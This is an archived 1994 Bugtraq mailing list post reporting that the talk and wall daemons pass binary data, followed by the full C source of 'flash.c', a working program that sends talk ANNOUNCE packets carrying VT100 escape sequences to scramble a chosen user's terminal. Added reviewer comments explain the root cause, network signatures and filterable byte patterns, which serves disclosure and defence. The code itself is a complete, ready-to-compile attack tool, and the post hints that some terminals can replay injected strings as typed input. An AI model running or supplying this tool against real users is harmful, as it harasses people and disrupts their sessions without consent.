Bugtraq mailing list archives
Wall and talkd pass binary data
From: rjq () phys ksu edu (Rob Quinn)
Date: Tue, 19 Jul 1994 18:06:45 -0500 (CDT)
talkd and walld both pass binary data (on Suns at least). Here's some source code I got from a friend. I informed Sun about the wall problem several months ago. This source just sends a string to mess up your fonts and such, but I've heard that some terminals have escape sequences that will buffer strings and re-issue them as if the user had typed them (I know there's an expression or term for that, but I can't think of it). I searched for this sequence for xterm, but didn't find one. I didn't look at any other terminal types. The date of this mail/source was June 9, so it's been out a while.
/* flash.c */
/*
 * This little program is intended to quickly mess up a user's terminal by
 * issuing a talk request to that person and sending vt100 escape characters
 * that force the user to logout or kill his/her xterm in order to regain a
 * sane view of the text. If the user's message mode is set to off (mesg n)
 * he/she will be unharmed.
 *
 * This program is really nasty :-)
 *
 * Usage: flash user@host
 *
 * try compiling with: gcc -o flash flash.c
 *
 * Reviewer notes (defensive reading):
 *  - The escape bytes are carried in the l_name field of talk ANNOUNCE
 *    control messages. The effect depends on the receiving talk daemon
 *    writing that field to the callee's terminal without filtering, which
 *    is the behaviour the accompanying post reports ("pass binary data").
 *  - Root cause is therefore on the receiving side: a daemon that writes
 *    network-supplied name fields to a tty should reject or escape
 *    non-printable bytes first. "mesg n" is the per-user workaround named
 *    above.
 *  - On the wire this shows up as UDP datagrams to ports 517 and 518 whose
 *    name fields contain ESC (0x1b); a legitimate user name has no reason
 *    to contain control characters.
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <strings.h>

/* this should really be in an include file.. */
#define OLD_NAME_SIZE 9
#define NAME_SIZE 12
#define TTY_SIZE 16

/*
 * Control message sent to port 517 by old_ANNOUNCE() below.
 * presumably mirrors the older talk daemon's wire format; verify against
 * the system's talk protocol header before relying on the layout.
 */
typedef struct {
    char type;                      /* request type, see "Types" below */
    char l_name[OLD_NAME_SIZE];     /* filled from the "local" argument */
    char r_name[OLD_NAME_SIZE];     /* filled from the "remote" argument */
    char filler;
    u_long id_num;                  /* set from the global "current" */
    u_long pid;                     /* set from getpid() */
    char r_tty[TTY_SIZE];           /* left empty by this program */
    struct sockaddr_in addr;
    struct sockaddr_in ctl_addr;
} OLD_MSG;

/*
 * Control message sent to port 518 by new_ANNOUNCE() below.
 * Same information as OLD_MSG plus a version byte and longer name fields.
 */
typedef struct {
    u_char vers;                    /* set to TALK_VERSION */
    char type;                      /* request type, see "Types" below */
    u_short filler;
    u_long id_num;                  /* set from the global "current" */
    struct sockaddr_in addr;
    struct sockaddr_in ctl_addr;
    long pid;                       /* set from getpid() */
    char l_name[NAME_SIZE];         /* filled from the "local" argument */
    char r_name[NAME_SIZE];         /* filled from the "remote" argument */
    char r_tty[TTY_SIZE];           /* left empty by this program */
} CTL_MSG;

#define TALK_VERSION 1 /* protocol version */

/* Types */
#define LEAVE_INVITE 0
#define LOOK_UP 1
#define DELETE 2
#define ANNOUNCE 3      /* the only type this program sends */

int current = 1; /* current id.. this to avoid duplications */

/*
 * Build an IPv4 socket address for hostname:port.
 *
 * hostname is first tried as a dotted-quad literal with inet_addr(); when
 * that returns -1 it is resolved with gethostbyname(). If the lookup fails
 * the program prints a message and exits, so the null-pointer return that
 * follows exit() is never reached.
 *
 * The result points into a single static buffer: each call overwrites the
 * previous result, so a caller must copy it out before calling again.
 */
struct sockaddr_in *getinaddr(char *hostname, u_short port)
{
    static struct sockaddr addr;
    struct sockaddr_in *address;
    struct hostent *host;

    /* The generic static sockaddr is used as storage for a sockaddr_in. */
    address = (struct sockaddr_in *)&addr;
    (void) bzero( (char *)address, sizeof(struct sockaddr_in) );
    /* fill in the easy fields */
    address->sin_family = AF_INET;
    address->sin_port = htons(port);
    /* first, check if the address is an ip address */
    address->sin_addr.s_addr = inet_addr(hostname);
    /* -1 is inet_addr()'s failure value; it is also what the literal
     * 255.255.255.255 parses to, so that input takes the lookup path too. */
    if ( (int)address->sin_addr.s_addr == -1) {
        /* it wasn't.. so we try it as a long host name */
        host = gethostbyname(hostname);
        if (host) {
            /* wow. It's a host name.. set the fields */
            /* ?? address->sin_family = host->h_addrtype; */
            bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length);
        } else {
            /* oops.. can't find it.. */
            puts("Couldn't find address");
            exit(-1);
            return (struct sockaddr_in *)0;
        }
    }
    /* all done. */
    return (struct sockaddr_in *)address;
}

/*
 * Send the psize bytes at p to target as one UDP datagram.
 *
 * Neither socket() nor sendto() is checked for failure, the descriptor is
 * never closed, and no value is returned although the function is
 * implicitly declared as returning int.
 */
SendTalkPacket(struct sockaddr_in *target, char *p, int psize)
{
    int s;
    struct sockaddr sample; /* not used.. only to get the size */

    s = socket(AF_INET, SOCK_DGRAM, 0);
    sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) );
}

/*
 * Build a CTL_MSG of type ANNOUNCE and send it to UDP port 518 on hostname.
 *
 * remote is copied into r_name and local into l_name. In this program
 * "local" is never a real user name: main() passes one of the escape
 * strings, so l_name is the field that carries the terminal control bytes.
 * presumably l_name is what the daemon prints as the caller's name; confirm
 * against the daemon's announce code.
 */
new_ANNOUNCE(char *hostname, char *remote, char *local)
{
    CTL_MSG packet;
    struct sockaddr_in *address;

    /* create a packet */
    /* Port 666 on the target host is put into both address fields of the
     * message; nothing in this file listens for a reply. */
    address = getinaddr(hostname, 666 );
    /* Overwrites the family with its byte-swapped form before it is copied
     * into the message. NOTE(review): presumably the protocol carries the
     * family in network byte order; confirm. */
    address->sin_family = htons(AF_INET);
    bzero( (char *)&packet, sizeof(packet) );
    packet.vers = TALK_VERSION;
    packet.type = ANNOUNCE;
    packet.pid = getpid();
    packet.id_num = current;
    /* Copy out of getinaddr()'s static buffer before it is reused below. */
    bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
    bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
    /* strncpy() zero-pads up to NAME_SIZE and does not guarantee a
     * terminating NUL when the source is NAME_SIZE bytes or longer. */
    strncpy( packet.l_name, local, NAME_SIZE);
    strncpy( packet.r_name, remote, NAME_SIZE);
    /* Writes a single NUL: the tty name is left empty. */
    strncpy( packet.r_tty, "", 1);
    SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) );
}

/*
 * Build an OLD_MSG of type ANNOUNCE and send it to UDP port 517 on hostname.
 *
 * Same steps as new_ANNOUNCE() but with the older message layout, which has
 * no version field.
 *
 * NOTE(review): l_name and r_name are OLD_NAME_SIZE (9) bytes in OLD_MSG,
 * but both strncpy() calls use NAME_SIZE (12) as the bound, so each copy
 * writes three bytes past the end of its member.
 */
old_ANNOUNCE(char *hostname, char *remote, char *local)
{
    OLD_MSG packet;
    struct sockaddr_in *address;

    /* create a packet */
    address = getinaddr(hostname, 666 );
    address->sin_family = htons(AF_INET);
    bzero( (char *)&packet, sizeof(packet) );
    packet.type = ANNOUNCE;
    packet.pid = getpid();
    packet.id_num = current;
    /* Copy out of getinaddr()'s static buffer before it is reused below. */
    bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
    bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
    strncpy( packet.l_name, local, NAME_SIZE);
    strncpy( packet.r_name, remote, NAME_SIZE);
    /* Writes a single NUL: the tty name is left empty. */
    strncpy( packet.r_tty, "", 1);
    SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
}

/*
 * Entry point: split argv[1] at '@' into user and host, then send three
 * rounds of ANNOUNCE messages, each carrying one escape string in the
 * l_name field.
 */
main(int argc, char *argv[])
{
    char *hostname, *username;
    int pid;

    /* fork() happens before any argument checking. */
    if ( (pid = fork()) == -1) {
        perror("fork()");
        exit(-1);
    }
    /* pid == 0 is the child, which exits at once; the parent carries on. */
    if ( !pid ) {
        exit(0);
    }
    if (argc < 2) {
        puts("Usage: <finger info> ");
        exit(5);
    }
    username = argv[1];
    if ( (hostname = (char *)strchr(username, '@')) == NULL ) {
        puts("Invalid name. ");
        exit(-1);
    }
    /* Split "user@host" in place: the '@' becomes the user's terminator. */
    *hostname = '\0';
    hostname++;
    /* A leading '~' on the user name is skipped. */
    if (*username == '~') username++;

/*
 * The three payloads, in VT100 terms (useful as patterns to filter on):
 *   FIRST   ESC c      reset the terminal
 *           ESC ( 0    select the DEC special graphics character set
 *           ESC # 8    screen alignment test pattern
 *   SECOND  ESC [1;3r  restrict the scrolling region to rows 1-3
 *           ESC [J     erase the display
 *   THIRD   ESC [5m    blink attribute
 *           ESC [?5h   reverse-video screen mode
 * Each fits in the NAME_SIZE-byte l_name field of CTL_MSG.
 */
#define FIRST "\033c\033(0\033#8"
#define SECOND "\033[1;3r\033[J"
#define THIRD "\033[5m\033[?5h"

    /* FIRST and THIRD go out in both message formats; SECOND is sent twice
     * in the newer format only. "current" is bumped between rounds so each
     * round has a different id_num. */
    new_ANNOUNCE(hostname, username, FIRST);
    old_ANNOUNCE(hostname, username, FIRST);
    current++;
    new_ANNOUNCE(hostname, username, SECOND);
    new_ANNOUNCE(hostname, username, SECOND);
    current++;
    new_ANNOUNCE(hostname, username, THIRD);
    old_ANNOUNCE(hostname, username, THIRD);
}
-- | | | Rob Quinn | | rjq () phys ksu edu | | QuinnBob@KSUVM.BITNET |